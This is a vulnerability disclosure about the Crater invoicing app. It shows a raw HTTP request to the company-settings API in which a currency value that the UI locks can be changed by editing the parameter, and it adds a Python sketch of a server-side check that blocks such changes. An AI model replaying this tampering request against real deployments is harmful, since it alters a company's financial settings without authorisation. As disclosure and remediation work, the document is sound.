It was found that the company currency cannot be changed in the UI because the field is disabled, as shown in the screenshot, but it can be changed by tampering with the parameter.
POST /api/v1/company/settings HTTP/1.1
Host: demo.craterapp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
Content-Type: application/json;charset=utf-8
X-XSRF-TOKEN:
Content-Length: 3344
Origin: https://demo.craterapp.com
Connection: close
Referer: https://demo.craterapp.com/admin/settings/preferences
Cookie:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"settings":{"invoice_auto_generate":"YES","payment_auto_generate":"YES","estimate_auto_generate":"YES","save_pdf_to_disk":"NO","invoice_mail_body":"You have received a new invoice from <b>{COMPANY_NAME}</b>.</br> Please download using the button below:","estimate_mail_body":"You have received a new estimate from <b>{COMPANY_NAME}</b>.</br> Please download using the button below:","payment_mail_body":"Thank you for the payment.</b></br> Please download your payment receipt using the button below:","invoice_company_address_format":"<h3><strong>{COMPANY_NAME}</strong></h3><p>{COMPANY_ADDRESS_STREET_1}</p><p>{COMPANY_ADDRESS_STREET_2}</p><p>{COMPANY_CITY} {COMPANY_STATE}</p><p>{COMPANY_COUNTRY} {COMPANY_ZIP_CODE}</p><p>{COMPANY_PHONE}</p>","invoice_shipping_address_format":"<h3>{SHIPPING_ADDRESS_NAME}</h3><p>{SHIPPING_ADDRESS_STREET_1}</p><p>{SHIPPING_ADDRESS_STREET_2}</p><p>{SHIPPING_CITY} {SHIPPING_STATE}</p><p>{SHIPPING_COUNTRY} {SHIPPING_ZIP_CODE}</p><p>{SHIPPING_PHONE}</p>","invoice_billing_address_format":"<h3>{BILLING_ADDRESS_NAME}</h3><p>{BILLING_ADDRESS_STREET_1}</p><p>{BILLING_ADDRESS_STREET_2}</p><p>{BILLING_CITY} {BILLING_STATE}</p><p>{BILLING_COUNTRY} {BILLING_ZIP_CODE}</p><p>{BILLING_PHONE}</p>","estimate_company_address_format":"<h3><strong>{COMPANY_NAME}</strong></h3><p>{COMPANY_ADDRESS_STREET_1}</p><p>{COMPANY_ADDRESS_STREET_2}</p><p>{COMPANY_CITY} {COMPANY_STATE}</p><p>{COMPANY_COUNTRY} {COMPANY_ZIP_CODE}</p><p>{COMPANY_PHONE}</p>","estimate_shipping_address_format":"<h3>{SHIPPING_ADDRESS_NAME}</h3><p>{SHIPPING_ADDRESS_STREET_1}</p><p>{SHIPPING_ADDRESS_STREET_2}</p><p>{SHIPPING_CITY} {SHIPPING_STATE}</p><p>{SHIPPING_COUNTRY} {SHIPPING_ZIP_CODE}</p><p>{SHIPPING_PHONE}</p>","estimate_billing_address_format":"<h3>{BILLING_ADDRESS_NAME}</h3><p>{BILLING_ADDRESS_STREET_1}</p><p>{BILLING_ADDRESS_STREET_2}</p><p>{BILLING_CITY} {BILLING_STATE}</p><p>{BILLING_COUNTRY} {BILLING_ZIP_CODE}</p><p>{BILLING_PHONE}</p>","payment_company_address_format":"<h3><strong>{COMPANY_NAME}</strong></h3><p>{COMPANY_ADDRESS_STREET_1}</p><p>{COMPANY_ADDRESS_STREET_2}</p><p>{COMPANY_CITY} {COMPANY_STATE}</p><p>{COMPANY_COUNTRY} {COMPANY_ZIP_CODE}</p><p>{COMPANY_PHONE}</p>","payment_from_customer_address_format":"<h3>{BILLING_ADDRESS_NAME}</h3><p>{BILLING_ADDRESS_STREET_1}</p><p>{BILLING_ADDRESS_STREET_2}</p><p>{BILLING_CITY} {BILLING_STATE} {BILLING_ZIP_CODE}</p><p>{BILLING_COUNTRY}</p><p>{BILLING_PHONE}</p>","currency":"1","time_zone":"UTC","language":"en","fiscal_year":"2-1","carbon_date_format":"Y/m/d","moment_date_format":"YYYY/MM/DD","notification_email":"noreply@[email protected]","notify_invoice_viewed":"NO","notify_estimate_viewed":"NO","tax_per_item":"NO","discount_per_item":"NO","invoice_email_attachment":"NO","estimate_email_attachment":"NO","payment_email_attachment":"NO","retrospective_edits":"allow","invoice_number_format":"{{SERIES:INV}}{{DELIMITER:-}}{{SEQUENCE:6}}","estimate_number_format":"{{SERIES:EST}}{{DELIMITER:-}}{{SEQUENCE:6}}","payment_number_format":"{{SERIES:PAY}}{{DELIMITER:-}}{{SEQUENCE:6}}","estimate_set_expiry_date_automatically":"YES","estimate_expiry_date_days":"7","invoice_set_due_date_automatically":"YES","invoice_due_date_days":"7","bulk_exchange_rate_configured":"YES","estimate_convert_action":"no_action","automatically_expire_public_links":"YES"}}
In the above request, the currency value is set to 1, which is US dollar and, as per the screenshot, cannot be changed.
However, changing the value to 2 changes the currency.
Since different currencies have different values, this might affect the company financially.
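The missing control is a server-side check that mirrors the disabled field. The following is an added, framework-neutral sketch of such a check, not Crater's own code. The function name, the `LOCKED_KEYS` policy and the sample dictionaries are assumptions; only the `currency` key and its values 1 and 2 come from the report.

```python
"""Server-side enforcement of a settings field the UI renders as disabled."""

# Assumption: keys the server treats as read-only once a value is stored.
# Only "currency" comes from the report; the policy itself is hypothetical.
LOCKED_KEYS = frozenset({"currency"})


class LockedSettingError(Exception):
    """Raised when a request tries to change a read-only setting."""

    def __init__(self, violations):
        self.violations = violations  # {key: (stored_value, submitted_value)}
        super().__init__("locked settings modified: " + ", ".join(sorted(violations)))


def apply_settings_update(stored, submitted, locked=LOCKED_KEYS):
    """Return the merged settings, or raise if a locked key would change.

    The client resubmits every setting on save, so a locked key may appear
    in the body as long as its value matches what is already stored.
    """
    violations = {}
    for key in locked:
        if key in submitted and key in stored:
            # Compare as strings so "1" and 1 are treated as the same value.
            if str(submitted[key]) != str(stored[key]):
                violations[key] = (stored[key], submitted[key])
    if violations:
        # Reject the whole request; the caller should log it and return 4xx.
        raise LockedSettingError(violations)
    merged = dict(stored)
    merged.update(submitted)
    return merged


# Constructed sample data modelled on the request body in the report.
STORED = {"currency": "1", "time_zone": "UTC", "language": "en"}
UNCHANGED = {"currency": "1", "time_zone": "Asia/Kolkata", "language": "en"}
TAMPERED = {"currency": "2", "time_zone": "UTC", "language": "en"}

if __name__ == "__main__":
    print(apply_settings_update(STORED, UNCHANGED))
    try:
        apply_settings_update(STORED, TAMPERED)
    except LockedSettingError as exc:
        print("rejected:", exc)
```

Rejecting the whole request, rather than silently dropping the locked key, gives the server an event it can log and alert on.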